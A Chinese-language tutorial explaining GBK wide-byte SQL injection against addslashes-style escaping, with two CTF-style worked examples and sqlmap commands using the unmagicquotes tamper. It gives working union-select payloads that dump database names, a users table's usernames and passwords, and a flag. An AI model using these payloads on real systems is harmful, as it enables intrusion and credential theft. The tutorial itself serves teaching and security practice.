本篇内容介绍了“SQL宽字节注入是什么”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!
基础知识
宽字节
在了解宽字节注入之前,我们要了解一下什么是宽字节,相对于单字节,我们引入一个字符数大小为两个字节的为宽字节,比如GBK编码,我们汉字通常使用的就是GBK编码,也就是说一次性会读取两个字节。
宽字节注入
产生宽字节注入的原因涉及了编码转换的问题,当我们的mysql使用GBK编码后,同时两个字符的前一个字符ASCII码大于128时,会将两个字符认成一个汉字,那么大家像一个,如果存在过滤我们输入的函数(addslashes()、mysql_real_escape_string()、mysql_escape_string()、Magic_quotes_gpc)会将我们的输入进行转义,那么我们是不是可以尝试注入,我们举一个简单的例子:
addslashes()函数
该函数的作用是返回在预定义字符之前添加反斜杠的字符串。于是我们可以分析一下我们转入的参数流程:
假设我们传入一个参数id为1'查看数据库是否错报:
index.php?id=1'
那么经过函数过滤后我们的输入拼接到sql语句就会变成:
select * from user where id = '1''
可以看到单引号被转义了,加入我们像下面一样传参:
可以看到我们传入的参数与\合并成了一个汉字,具体可以参考下图:
可以看到我们的单引号没有被转义,从而达到了闭合单引号的效果,这就是一个简单的宽字节注入。但是需要有个前提,也就是MYSQL设置了GBK编码:
SET character_set_client =gbk
例子
例题一
进入页面发现url可以有个变量id可以传入参数,于是我们传参测试是否报错
?id=1'
发现单引号被转义了,数据库没有进行错报,具体可以看下图:
结合我们上面学习到的宽字节注入的知识,怀疑是addslashes函数转义了我们的单引号,于是我们尝试进行绕过,我们先查询列数:
?id=1%aa%27 order by 3--+
发现列数为三后,判断回显位置:
?id=-1%aa%27union select 1,2,database()--+
成功爆出了数据库的名字,于是后面操作就跟平常的SQL注入一样了:
?id=-1%aa%27union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--+
例题二
打开网页有一个查询框让我们进行查询,我们尝试加入单引号但发现没有报错,于是查看下源码看看有没有有用信息:
gb2312正是汉字编码字符集,于是我们尝试宽字节注入:
?id=1%df%27%20union%20select%201,database()%23
成功回显了数据库的名字,说明可行,于是我们继续注入:
?id=1%df%27%20union%20select%201,string%20from%20sql5.key%20--%20
得到了我们想要查询的信息。
SQLMAP应用
SQLMAP作为一个强大的SQL注入自动化工具也是可以进行宽字节注入测试的,下面我们来学习一下利用SQLMAP走一遍宽字节注入的流程:
先跑数据库名:
sqlmap.py -u "http://sql/index.php?id=3" --tamper unmagicquotes --dbs
其中tamper为利用SQLMAP中自带的脚本,当然我们也可以手动导入,而unmagicquotes为我们宽字节注入利用的脚本,下面查询表名:
index.php?id=3" --tamper unmagicquotes -D 'xino' --tables
爆出来表名后爆列名:
index.php?id=3" --tamper unmagicquotes -D `xino` -T ctf --columns
之后我们爆出数据:
id=3" --tamper unmagicquotes -D `xino` -T ctf -C flag
SQLMAP中进行宽字节注入还是比较简单的,只需要注意我们利用到了sqlmap的宽字节注入脚本,其他的跟平时注入并没有很大的差别。
“SQL宽字节注入是什么”的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识可以关注编程网网站,小编将为大家输出更多高质量的实用文章!